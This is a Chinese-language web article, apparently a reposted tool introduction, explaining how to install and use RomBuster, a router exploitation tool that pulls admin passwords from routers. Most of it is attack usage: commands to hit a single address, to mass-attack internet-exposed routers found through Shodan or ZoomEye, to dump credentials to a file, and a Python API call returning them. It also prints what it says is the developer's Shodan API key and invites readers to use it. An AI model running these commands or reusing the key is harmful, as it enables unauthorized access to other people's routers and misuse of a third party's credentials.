如何使用RomBuster获取你的网络路由器密码

[[416111]]

关于RomBuster

RomBuster是一款功能强大的针对网络路由器的漏洞利用工具,该工具能够帮助广大研究人员对网络路由器的安全性进行分析,并获取目标路由器的管理员密码。

功能介绍

  • 能够利用大多数热门路由器中的安全漏洞,例如D-Link、Zyxel、TP-Link和华为等等。
  • 经过优化处理,可从列表中读取多个目标路由器,并进行安全分析和漏洞利用。
  • 简单的命令行接口和API用法。

工具安装

由于RomBuster使用Python3开发,因此首先需要在本地设备上安装并配置好Python3环境。接下来,广大研究人员可以使用下列命令下载并安装RomBuster:

  1. pip3 install git+https://github.com/EntySec/RomBuster 

基础使用

RomBuster的使用非常简单,我们只需要在命令行终端中输入“rombuster”命令即可使用RomBuster:

  1. usage: rombuster [-h] [-o OUTPUT] [-i INPUT] [-a ADDRESS] [--shodan SHODAN] 
  2.  
  3.                  [--zoomeye ZOOMEYE] [-p PAGES] 
  4.  
  5.   
  6.  
  7. RomBuster is a router exploitation tool that allows to disclosure network 
  8.  
  9. router admin password. 
  10.  
  11.   
  12.  
  13. optional arguments: 
  14.  
  15.   -h, --help            显示这个帮助信息并退出 
  16.  
  17.   -o OUTPUT, --output OUTPUT 
  18.  
  19.                         将结果存储至文件 
  20.  
  21.   -i INPUT, --input INPUT 
  22.  
  23.                         地址列表输入文件 
  24.  
  25.   -a ADDRESS, --address ADDRESS 
  26.  
  27.                         提供单个地址 
  28.  
  29.   --shodan SHODAN       通过网络利用远程设备所使用的Shodan API密钥 
  30.  
  31.   --zoomeye ZOOMEYE     通过网络利用远程设备所使用的ZoomEye API密钥 
  32.  
  33.   -p PAGES, --pages PAGES 
  34.  
  35.                         需要通过ZoomEye获取的页面数量 

工具使用样例

(1) 攻击单个路由器

下列命令可以攻击单个网络路由器:

  1. rombuster -a 192.168.99.1 

(2) 通过网络攻击远程路由器

接下来,我们可以使用Shodan搜索引擎来搜索并攻击网络上的由器:

  1. rombuster --shodan PSKINdQe1GyxGgecYz2191H2JoS9qvgD 

注意:项目中给出的Shodan API密钥(PSKINdQe1GyxGgecYz2191H2JoS9qvgD)是开发人员自己的专业版API密钥,你可以使用你自己的密钥,当然了你想用开发人员的也没意见,大家资源共享嘛!

(3) 从输入文件获取目标路由器

我们还可以使用开放数据库中提供的摄像头地址:

  1. rombuster -i routers.txt -o passwords.txt 

注意:此命令将会攻击routers.txt中给出的所有摄像头,并会将所有获取到的密码存储至passwords.txt文件中。

API使用

RomBuster还提供了自己的Python API,可以将其导入至你们自己的项目代码中并调用其功能:

  1. from rombuster import RomBuster 

(1) 基础函数

下面给出的是RomBuster支持的基础函数,可以用于利用指定路由器中的安全漏洞:

exploit(address):攻击指定地址的单个路由器

(2) 调用样例

攻击单个路由器:

  1. from rombuster import RomBuster 
  2.  
  3.   
  4.  
  5. rombuster = RomBuster() 
  6.  
  7. creds = rombuster.exploit('192.168.99.1') 
  8.  
  9.   
  10.  
  11. print(creds) 

项目地址

RomBuster:【GitHub传送门

 

文章来源网络,作者:运维,如若转载,请注明出处:https://shuyeidc.com/wp/125546.html<

(0)
运维的头像运维
上一篇2025-02-23 19:23
下一篇 2025-02-23 19:24

相关推荐

  • 人工智能+人=强大的网络安全

    麻省理工研究出一个新型混杂式系统,基于人工智能(AI)梳理数据,并将当前可疑行为提交给分析人员,能够检测85%的攻击。 既然人和AI都无法单独在网络安全维护工作上取得压倒性成功,为…

  • 中国银行网银遭山寨 5万用户遭遇网银升级骗局

    1月20日,金山网络安全中心发布橙色安全预警称,近日,不法分子冒充中国银行以中行网银E令(网上银行动态口令牌)升级为由实施网络诈骗,此类诈骗手法将传统的短信诈骗与钓鱼网站相结合,欺…

  • 边界安全:IDC对下一代防火墙的解读

    下一代防火墙概念于五年前由Gartner首次提出,随后受到了业界的大力追捧。然而,近几年来,诸多IT技术发生了巨大的演进,新型威胁则更是层出不穷,下一代防火墙已由最初的一个技术概念…

  • 聊聊最近几款非常流行的勒索病毒

    2020年勒索病毒攻击比以往都来的更猛了一点,各种不同的勒索病毒黑客组织都似乎加大了这方面的投入,而且又有一些新的黑客组织加入进来,导致现在勒索病毒攻击越来越频繁了,最近几款流行的…

  • 2020年云安全的九大关键趋势

     2020年新冠疫情加速了“云计算与安全”、“网络与安全”的融合趋势。“云优先”时代,企业越来越依赖云计算。但是对于大多数企业来说,业务上云并不意味着安全上云,“靠山山倒…

发表回复

您的邮箱地址不会被公开。必填项已用 * 标注